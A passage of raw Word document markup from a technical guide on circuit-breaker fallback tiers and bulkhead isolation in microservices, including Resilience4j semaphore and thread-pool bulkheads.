      <w:r w:rsidRPr="006E6644">
        <w:t>Serve the last successful response from a local or distributed cache. This is the highest-quality fallback — users get real data, just potentially stale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2827041E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Implementation: Alongside the circuit-breaker-wrapped call, maintain a cache (Redis, local LRU cache) of recent successful responses keyed by the request parameters. On CallNotPermittedException, look up the cache. If found, return the cached response with a header indicating the staleness:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD5AC24" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F39D897" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>X-Served-From-Cache: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7936E7E7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>X-Cache-Age: 45s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6B7AF5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cache-circuit breaker integration:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The cache should have a TTL longer than the expected circuit open duration. If the circuit stays open for 60 seconds and the cache TTL is 30 seconds, the cache expires before the circuit closes — fallback has no data. Cache TTL should be at minimum 2–3× the open timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1858F487" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tier 2 — Secondary Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A9AB9F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Call an alternative service with degraded but functional capability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3329BEAA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="974"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Primary: personalized recommendation service (ML-based, expensive). Falls back to: generic popularity-based recommendations (simple, fast, more reliable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638459AB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="974"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Primary: real-time fraud detection service (complex ML model). Falls back to: rule-based fraud detection (simpler, faster, less accurate but functional).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6770F41F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="974"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Primary: live inventory API. Falls back to: last-known inventory from a database snapshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735244E4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tier 3 — Default Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3629D3CB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Return a predefined default that represents a safe, empty, or neutral state:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAEDB0C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="975"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Product recommendations → empty list or featured products list (hardcoded).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3816666D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="975"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>User preferences → system defaults.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E64423B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="975"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Personalization → non-personalized version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774DBB14" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>This is the simplest fallback — no additional service calls, no cache dependency. Always works. The quality is lowest — users get generic experience rather than personalized experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0EF2CF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tier 4 — Graceful Error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6485FBD6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>When no meaningful fallback is possible, return a clear, actionable error to the user rather than a confusing timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031B3EB3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47411977" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277ACC2A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  "error": "payment_service_unavailable",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF74140" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  "message": "Payment processing is temporarily unavailable. Please try again in a few minutes.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248EED7F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  "retry_after": 60,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A39F249" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  "support_url": "https://status.example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C10A97F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664331D8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>A fast, clear error is better than a 30-second timeout followed by a cryptic error. Users can decide to wait and retry (they know exactly when to retry from retry_after), rather than waiting and not knowing if the system is hung.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADC1AF6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tier 5 — Request Queuing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290333FF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>For write operations (creating orders, processing payments) that can't be lost, queue the request for later processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEE954D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="976"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit is open → payment service unreachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE298BE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="976"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Store the payment request in a durable queue (Kafka, SQS, database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690A8EE8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="976"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Return 202 Accepted to the client with a request ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55194AF9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="976"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>When payment service recovers, process queued requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465E137D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="976"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Notify client via webhook or polling endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221E84DE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>This is </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>asynchronous graceful degradation</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — no data is lost, the user experience is delayed but not broken. Not all operations can be queued (balance inquiries can't be answered from a queue), but write operations often can be.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DC060E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Fallback Failure Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE0EC8D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Fallbacks can fail too. If the cache service is down, Tier 1 fallback fails. If the secondary service is also failing (common during widespread outages), Tier 2 fails. The fallback chain must itself be resilient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DFB02B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fallback fallback pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61763E61" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10440A80" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Primary call → Circuit breaker open → Tier 1 fallback (cache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D537C43" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                                        → Cache unavailable → Tier 2 fallback (secondary service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D2CCD1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                                                               → Secondary unavailable → Tier 3 (default response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0008236E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Each fallback tier should be simpler and more reliable than the previous — the final tier (default response or graceful error) should have no external dependencies and never fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5343DA99" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit breaker for fallbacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D25FCCB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Wrap the fallback service call in its own circuit breaker. If the cache service is failing, its circuit breaker opens, and the cache fallback fast-fails — allowing immediate progression to Tier 2 without waiting for cache timeouts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655FDDB9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="1B6FA56F">
          <v:rect id="_x0000_i4109" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C9E44A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Bulkhead Integration — Circuit Breakers and Resource Isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4147BBCE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit breakers and bulkheads are complementary patterns — circuit breakers detect failures and fail fast; bulkheads limit resource consumption per dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FCAE44" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Combined Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B65E24" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Without bulkheads, even a closed circuit breaker (passing calls) can cause resource exhaustion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7646533B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F3FB91" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Scenario: Payment service is slow (2 seconds/request, normal is 100ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6506AA56" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">          Circuit breaker threshold not yet breached (failure rate &lt; 50%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC19C15" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">          Thread pool: 200 threads shared across all downstream calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8D9F41" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="1D236159" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Result: 200 threads/2 seconds = 100 slow payment calls fill all 200 threads in 2 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715A59E9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">        No threads for user service, inventory service, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323843E5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">        System appears completely down even though only payment service is slow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33917299" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">        Circuit breaker hasn't opened because calls technically succeed (just slowly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE61937" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With bulkheads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6257AE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACA7C0F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Payment service thread pool: 50 threads (dedicated bulkhead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75064115" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>User service thread pool: 50 threads (dedicated bulkhead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFBC9BA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Inventory service thread pool: 50 threads (dedicated bulkhead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5576AB3A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Shared pool: 50 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4493B4ED" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="7190AE4E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Payment service is slow → fills its 50-thread bulkhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567BC7BE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>User service, inventory service: unaffected, operating normally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AAA2F5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit breaker slow call rate threshold → eventually opens the payment circuit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3A7029" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Semaphore-based bulkheads (Resilience4j):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EDC8F6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>A counting semaphore limits concurrent calls per dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774346B4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFC5037" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>PaymentService circuit breaker: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9E433E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  sliding_window: COUNT_BASED(100),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8685B5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  failure_rate_threshold: 50%,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C41EAF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  bulkhead: SEMAPHORE(max_concurrent=25)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DA06AD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3EF249" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>When 25 concurrent calls are in flight to the payment service, the 26th call fails immediately (BulkheadFullException) without entering the circuit breaker's window. The circuit breaker's window only records actual attempted calls, not bulkhead rejections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE1D9BF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thread pool isolation vs semaphore isolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166B5EB6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Semaphore bulkhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The calling thread holds the semaphore while making the downstream call. The calling thread is blocked if the downstream is slow. 25 slow payment calls block 25 calling threads. Simpler (no additional threads), but the calling threads are still consumed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301D3C5E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Thread pool bulkhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Downstream calls are dispatched to a dedicated thread pool. The calling thread submits the task and immediately continues (non-blocking). The downstream call runs in the pool thread. 25 slow payment calls block 25 pool threads, not 25 calling threads. More complex (two thread pools), but the calling thread is never blocked — it returns immediately if the pool is full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA1AA3A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thread pool isolation is superior for I/O-bound downstream calls</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — the calling thread is freed to process other requests while the pool thread waits for the slow downstream. This is the Hystrix model (now largely superseded by Resilience4j's semaphore model combined with async/reactive programming).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110C693C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="252A5DA8">
          <v:rect id="_x0000_i4110" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="242DE782" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
